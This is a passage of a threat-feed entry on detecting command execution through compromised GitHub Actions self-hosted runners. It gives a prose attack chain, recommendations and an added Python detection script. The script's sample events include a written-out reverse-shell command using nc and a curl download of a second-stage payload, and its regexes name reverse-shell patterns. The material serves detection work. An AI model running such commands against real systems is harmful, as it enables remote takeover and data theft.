The Elastic detection rule aims to identify such malicious activity.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains unauthorized access to a GitHub repository linked to a self-hosted runner.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies an existing workflow or creates a new one to inject malicious commands.\u003c/li\u003e\n\u003cli\u003eThe compromised workflow is triggered, initiating the \u003ccode\u003eRunner.Worker\u003c/code\u003e process on the runner host.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eRunner.Worker\u003c/code\u003e process executes a shell interpreter (e.g., bash, sh, zsh) via an entrypoint script.\u003c/li\u003e\n\u003cli\u003eThe shell interpreter executes malicious commands specified in the compromised workflow, such as downloading a payload using \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is executed, establishing a reverse shell connection to an attacker-controlled server using \u003ccode\u003enc\u003c/code\u003e or \u003ccode\u003esocat\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker performs reconnaissance, credential harvesting, or lateral movement within the runner host and connected network.\u003c/li\u003e\n\u003cli\u003eSensitive data is exfiltrated from the compromised runner host to the attacker\u0026rsquo;s infrastructure.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to the complete compromise of the self-hosted runner environment. This could result in the theft of sensitive source code, credentials, and other proprietary information. The attack can also be used as a stepping stone for further attacks on the organization\u0026rsquo;s internal network and infrastructure. 
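Detection logic for the process-tree conditions this brief describes, as an added example (Python; neither Elastic's rule nor CraftedSignal's Sigma rule): it flags download and network tools whose parent is Runner.Worker itself or a shell running an action's entrypoint.sh, and upgrades the verdict when the command line looks like a reverse shell. The events are constructed Sysmon-style records; the tool list and the reverse-shell patterns are assumptions. It deliberately leaves bare shells out of the child watchlist, because Runner.Worker spawns one for every run: step, and keys on what those shells launch instead.

```python
"""Process-tree detection for tools launched under the GitHub Actions runner.

Added example implementing the process-creation conditions listed in this brief's
recommendations; it is neither Elastic's rule nor CraftedSignal's Sigma rule. The events
are constructed Sysmon-style records (Image, CommandLine, ParentImage, ParentCommandLine).
"""
import re

# Assumed watchlist of download / network tools; bare shells are intentionally excluded.
NETWORK_TOOLS = {"curl", "wget", "nc", "ncat", "socat", "ssh", "powershell.exe", "pwsh", "cmd.exe"}
SHELLS = {"bash", "sh", "zsh", "dash"}
RUNNER_WORKER_RE = re.compile(r"(^|[\\/])Runner\.Worker(\.exe)?$", re.IGNORECASE)
ENTRYPOINT_RE = re.compile(r"entrypoint\.sh\b")
# Assumed command-line shapes that turn a flagged event into a probable reverse shell.
REVERSE_SHELL_RE = re.compile(
    r"\b(nc|ncat)\b.*\s(-e|--exec)\s|\bsocat\b.*\bexec:|/dev/tcp/|\bbash\s+-i\b", re.IGNORECASE)


def basename(path):
    return re.split(r"[\\/]", path)[-1]


def runner_spawned(event):
    """True when the parent is Runner.Worker, or a shell the runner launched to run an
    action's entrypoint.sh (the process shape in the trivy-action compromise)."""
    parent = event.get("ParentImage", "")
    if RUNNER_WORKER_RE.search(parent):
        return True
    return basename(parent) in SHELLS and bool(ENTRYPOINT_RE.search(event.get("ParentCommandLine", "")))


def classify(event):
    """Return None, 'network-tool' or 'reverse-shell' for one process-creation event."""
    if not runner_spawned(event) or basename(event.get("Image", "")).lower() not in NETWORK_TOOLS:
        return None
    return "reverse-shell" if REVERSE_SHELL_RE.search(event.get("CommandLine", "")) else "network-tool"


def flag_events(events):
    """(index, verdict) for every event that matches."""
    hits = []
    for i, e in enumerate(events):
        verdict = classify(e)
        if verdict:
            hits.append((i, verdict))
    return hits


WORKER = "/home/runner/actions-runner/bin/Runner.Worker"
ENTRY = "bash /home/runner/work/_actions/example/action/0.24.0/entrypoint.sh"  # constructed path

# Constructed events: 0 and 3 are ordinary runner activity, 1 and 2 are the attack chain,
# 4 is a curl from a plain run: step that this logic does not cover.
EVENTS = [
    {"Image": "/usr/bin/bash", "CommandLine": "bash -e /home/runner/work/_temp/step.sh",
     "ParentImage": WORKER, "ParentCommandLine": "Runner.Worker"},
    {"Image": "/usr/bin/curl", "CommandLine": "curl -fsSL https://example.invalid/stage2 -o /tmp/.s",
     "ParentImage": "/usr/bin/bash", "ParentCommandLine": ENTRY},
    {"Image": "/usr/bin/nc", "CommandLine": "nc -e /bin/sh 198.51.100.7 4444",
     "ParentImage": "/usr/bin/bash", "ParentCommandLine": ENTRY},
    {"Image": "/usr/bin/node", "CommandLine": "node /home/runner/work/_actions/actions/checkout/v4/dist/index.js",
     "ParentImage": WORKER, "ParentCommandLine": "Runner.Worker"},
    {"Image": "/usr/bin/curl", "CommandLine": "curl -sSf https://example.invalid/health",
     "ParentImage": "/usr/bin/bash", "ParentCommandLine": "bash -e /home/runner/work/_temp/step.sh"},
]


if __name__ == "__main__":
    for index, verdict in flag_events(EVENTS):
        print(index, verdict, EVENTS[index]["CommandLine"])
```

Event 4 shows the blind spot of the entrypoint.sh condition: a curl launched from an ordinary run: step has a shell parent without that marker and is not matched, and legitimate actions do call curl and wget, so expect to tune the watchlist or add a known-good allowlist per repository before alerting on the network-tool verdict; the reverse-shell verdict is far less noisy.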
Affected sectors include software development, DevOps, and any organization using GitHub Actions with self-hosted runners.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eExecution via GitHub Actions Runner\u003c/code\u003e to your SIEM to detect suspicious commands executed by the GitHub Actions Runner.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for commands like \u003ccode\u003ecurl\u003c/code\u003e, \u003ccode\u003ewget\u003c/code\u003e, \u003ccode\u003enc\u003c/code\u003e, \u003ccode\u003esocat\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003ebash\u003c/code\u003e, and \u003ccode\u003essh\u003c/code\u003e spawned by \u003ccode\u003eRunner.Worker\u003c/code\u003e or shell interpreters with \u003ccode\u003eentrypoint.sh\u003c/code\u003e in their command line (see Sigma rule).\u003c/li\u003e\n\u003cli\u003eImplement strict access control policies for GitHub repositories and workflows to prevent unauthorized modifications.\u003c/li\u003e\n\u003cli\u003eRegularly review and audit GitHub Actions workflows for suspicious or unexpected commands.\u003c/li\u003e\n\u003cli\u003eIsolate self-hosted runners in a segmented network to limit the impact of a potential compromise.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process-creation logging to provide detailed process execution information for effective detection.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T10:00:00Z","date_published":"2024-01-02T10:00:00Z","id":"/briefs/2024-01-github-actions-runner-execution/","summary":"Adversaries compromising GitHub Actions workflows can execute arbitrary commands on runner hosts, leading to code execution, reconnaissance, credential harvesting, or network exfiltration.","title":"Execution via GitHub Actions 
Runner","url":"https://feed.craftedsignal.io/briefs/2024-01-github-actions-runner-execution/"}],"language":"en","title":"CraftedSignal Threat Feed — Github-Actions","version":"https://jsonfeed.org/version/1.1"}